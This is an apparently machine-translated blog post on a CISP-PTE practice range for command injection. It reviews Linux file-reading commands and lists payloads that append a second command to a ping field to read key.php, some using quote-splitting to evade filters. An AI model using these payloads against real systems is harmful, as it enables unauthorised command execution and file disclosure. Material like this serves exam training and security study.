当前位置:网站首页>Command injection of cisp-pte
Command injection of cisp-pte
2022-07-07 01:54:00 【Colorful @ star】
Command the range explanation
In the last article, we explained the practical exercises ( Two ) Explanation , There is a second solution to the command execution , That is, without filtering , There will be an answer soon .
We just use tac To read a file
Submit , See what happens
Find out , The answer appears directly , Relevant statements are not filtered , therefore , In the exam , There will also be filtering , Everyone should learn how to bypass , Find out .
Command injection related knowledge explanation
Personally, I think this command injection is the simplest .
Before that, let's learn what commands can be used to read files .
linux There are mainly seven kinds of instructions commonly used to read the contents of files :
cat、tac、nl、more、less、head、tail
cat: Start with the first line , And output all the content
cat file name Display the contents of the file on the screen
cat -n file name Display the contents of the file on the screen , And display the line number
cat -b file name Display the contents of the file on the screen , And display the line number , But the blank line number is not displayed
tac: Show the contents in reverse order from the last line , And output all the content
tac file name Display the contents of the file on the screen , But it starts from the last line and goes forward
tac -s separator file name – from separator Output backward , The output in reverse order does not contain separator, Output to the last line, and then in order separator Previous content output
tac -b -s separator file name – from separator Output backward , The output in reverse order contains separator, Output to the last line, and then in order separator Previous content output
nl: Be similar to cat-n, Output line number when displaying
nl file name ( Namely nl -b t file name ) Use nl The instruction must show the line number , It is mainly about how to display the operation line number
nl -b a file name According to the line Numbers , Blank lines also display line numbers
nl -b t file name According to the line Numbers , Blank lines do not show line numbers ( The default value is )
nl -w Numbers x file name The number of digits occupied by the line number field
nl -n ln file name The line number is displayed at the leftmost end of the space in the front of the field
nl -n rn file name The line number is displayed at the right end of the space in the front of the field , And no more 0
nl -n rz file name The line number is displayed at the right end of the space in the front of the field , And add 0
more: Depending on the window size , Check the contents of the file page by page
more file name
less: and more similar , But its advantage can turn the page forward , And it can search for characters
less file name
head: Show only the first few lines
haed file name – Display the first ten lines of the file
tail: Show only the last few lines
tail file name – Show end of file
Related topics can be set payload:
After testing , following payload Can complete this problem .
127.0.0.1 | less …/key.php
127.0.0.1 | m’or’e …/key.php
127.0.0.1 | tail …/key.php
127.0.0.1 | v’'i …/key.php
127.0.0.1 | c’a’t …/key.php
127.0.0.1 | head …/key.php
127.0.0.1 | nl …/key.php
|od -c …/key.php
|xxd …/key.php
|xxd …/key.php|grep key
|grep “key” …/key.php
|sed -n ‘1,5p’ …/key.php|grep key
The range where relevant orders are executed
Just use the one just now payload try :
127.0.0.1 | m’or’e …/key.php
After testing, this range can be used payload:
127.0.0.1 | v’'i …/key.php
127.0.0.1 | c’a’t …/key.php
127.0.0.1 |xxd …/key.php
127.0.0.1 |grep “key” …/key.php
边栏推荐
- mongodb查看表是否导入成功
- 百度飞将BMN时序动作定位框架 | 数据准备与训练指南 (上)
- ROS learning (XIX) robot slam function package cartographer
- Analyze "C language" [advanced] paid knowledge [i]
- Compile command line terminal swift
- Hutool post requests to set the body parameter to JSON data
- ZOJ Problem Set – 2563 Long Dominoes 【如压力dp】
- AcWing 1142. 繁忙的都市 题解(最小生成树)
- JS ES5也可以創建常量?
- ROS learning (24) plugin
猜你喜欢
Appium基础 — Appium Inspector定位工具(一)
ROS learning (21) robot slam function package -- installation and testing of orbslam
BigDecimal 的正确使用方式
AcWing 1148. 秘密的牛奶运输 题解(最小生成树)
Yiwen takes you into [memory leak]
鼠标右键 自定义
Let's see how to realize BP neural network in Matlab toolbox
ROS learning (25) rviz plugin
Clickhouse fields are grouped and aggregated, and SQL is queried according to the granularity of any time period
Start from the bottom structure to learn the customization and testing of fpga---- FIFO IP
随机推荐
AcWing 1148. 秘密的牛奶运输 题解(最小生成树)
ROS學習(23)action通信機制
How did partydao turn a tweet into a $200million product Dao in one year
JS ES5也可以創建常量?
PartyDAO如何在1年内把一篇推文变成了2亿美金的产品DAO
Baidu flying general BMN timing action positioning framework | data preparation and training guide (Part 2)
AcWing 344. 观光之旅题解(floyd求无向图的最小环问题)
Drag to change order
永久的摇篮
JS ES5也可以创建常量?
JVM memory model
ROS学习(25)rviz plugin插件
2022/0524/bookstrap
猫猫回收站
The use of video in the wiper component causes full screen dislocation
一文带你走进【内存泄漏】
According to the analysis of the Internet industry in 2022, how to choose a suitable position?
The difference between Tansig and logsig. Why does BP like to use Tansig
AcWing 345. 牛站 题解(floyd的性质、倍增)
454-百度面经1